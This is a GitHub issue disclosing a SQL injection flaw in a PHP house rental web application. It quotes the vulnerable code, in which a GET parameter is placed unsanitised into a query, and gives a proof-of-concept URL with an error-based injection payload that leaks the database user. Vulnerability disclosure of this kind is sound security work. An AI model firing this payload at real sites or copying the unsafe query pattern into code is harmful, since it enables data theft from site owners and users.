Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection vulnerability in House Rental System #6

Closed
huclilu opened this issue Dec 2, 2022 · 0 comments
Closed

SQL injection vulnerability in House Rental System #6

huclilu opened this issue Dec 2, 2022 · 0 comments

Comments

@huclilu
Copy link

huclilu commented Dec 2, 2022

Build environment: Apache 2.4.39; MySQL5.7.26; PHP7.3.4

SQL injection vulnerability in House Rental System

In view property In PHP, from line 32 to line 34 of the code, property_ The ID is passed to the backend through get and assigned to the variable $property_ ID, and then executed the SQL statement query, and substituted it into the database. There is no single quotation mark protection, nor any filter function, and then returned mysqli_ Query Query Results

	$property_id=$_GET['property_id'];
    $sql="SELECT * from add_property where property_id='$property_id'";
	$query=mysqli_query($db,$sql);

POC:

http://xxx.com/view-property.php?property_id=124%27%20and%20(select%201%20from%20(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--%20ace

@huclilu huclilu closed this as completed Dec 17, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant